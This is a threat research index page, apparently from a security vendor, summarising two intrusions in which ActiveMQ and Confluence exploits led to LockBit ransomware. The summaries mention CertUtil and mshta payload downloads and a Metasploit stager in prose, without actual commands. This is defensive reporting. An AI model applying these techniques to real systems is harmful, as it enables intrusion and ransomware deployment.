Threat Research

    Apache ActiveMQ Exploit Leads to LockBit Ransomware

    The intrusion started in mid-February 2024 when a threat actor exploited CVE-2023-46604 on an exposed Apache ActiveMQ server. By leveraging a Java Spring class and a custom Spring bean XML configuration, the attacker achieved remote code execution. The malicious XML executed a command that used Windows CertUtil to download a payload from a remote server....
    2/24/2026  0
    Read More »

    Confluence Exploit Leads to LockBit Ransomware

    The attack began with the exploitation of CVE-2023-22527, a critical RCE vulnerability in Confluence, on a Windows server. Initial signs of activity included system discovery commands like net user and whoami. The attacker attempted to download AnyDesk via curl, failing at first but later retrieving it using mshta and a remote HTA file containing a Metasploit stager....
    2/28/2025  0
    Read More »
    Looking for Something?
    Threat Research Categories:
    Tags

    Privacy & Security StatementTerms & Conditions
    Copyright © 2026 by Gurucul - All rights reserved.